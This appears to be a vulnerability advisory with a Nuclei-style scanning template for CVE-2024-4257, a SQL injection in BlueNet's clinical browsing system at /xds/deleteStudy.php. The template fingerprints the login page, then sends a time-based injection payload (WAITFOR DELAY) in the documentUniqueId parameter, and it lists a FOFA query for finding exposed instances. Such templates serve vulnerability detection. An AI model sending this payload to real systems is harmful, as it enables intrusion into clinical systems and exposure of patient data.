A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.
PoC代码[已公开]
id: CVE-2024-4257
info:
name: BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection
author: s4e-io
severity: medium
description: |
A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4257
- https://github.com/GAO-UNO/cve/blob/main/sql.md
- https://vuldb.com/?submit.321338
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2024-4257
cwe-id: CWE-89
epss-score: 0.9213
epss-percentile: 0.9969
metadata:
verified: true
max-request: 1
fofa-query: app="LANWON-临床浏览系统"
tags: time-based-sqli,cve,cve2024,sqli,blunet,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>临床浏览</title>")'
- 'contains(header,"text/html")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
@timeout 20s
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- 'contains(header,"text/html")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100c1dc8e30b0e4a4c8f56f9d3c9198922b90deaee25e343b8b6f95cf3894002358022034f56ff79d2576897df7344b0cd04b216b5843c63d84c78dbb92c9c26302d0ed:922c64590222798bb761d5b6d8e72950